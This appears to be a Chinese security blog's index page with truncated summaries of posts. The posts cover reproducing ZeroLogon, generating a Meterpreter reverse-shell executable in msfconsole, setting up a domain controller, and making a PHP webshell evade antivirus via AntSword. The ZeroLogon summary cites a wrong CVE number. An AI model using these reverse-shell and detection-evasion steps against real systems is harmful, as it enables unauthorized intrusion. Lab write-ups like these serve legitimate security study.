lisyr

摘要： zerologon漏洞复现 漏洞介绍 CVE-2020-14722 (又称ZeroLogon) 是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中，使用了AES-CFB8模式并且错误的将IV设置为 阅读全文

摘要： 1.利用msf生成反弹shell msfconsole #打开msf use payload/windows/meterpreter/reverse_tcp #打开生成payload模板 set lhost #设置ip（攻击机接受ip） set lport #设置端口 generate -f exe 阅读全文

摘要： 1.服务器管理器中打开角色,点击添加角色 2.安装active directory域服务,一直下一步到安装完成 3.在win+r输入dcpromo.exe,弹出安装向导 4.根据提示填写内容到安装完成 5.把ip改成静态ip,dns改成本机ip 6.成员机dns改成域控服务器ip 7.控制面板-系统 阅读全文

摘要： 0x01一句话木马免杀 1.编写一句话木马 这里我使用的绕过方法是拼接函数名和全局变量绕过 2.分别用virustotal和d盾进行扫描,结果如下 3.把木马放到网站目录下,并用蚁剑链接数据 0x02rsa免杀 1.打开蚁剑,新建php编码器 2.在rsa配置中生成webshell! image 3 阅读全文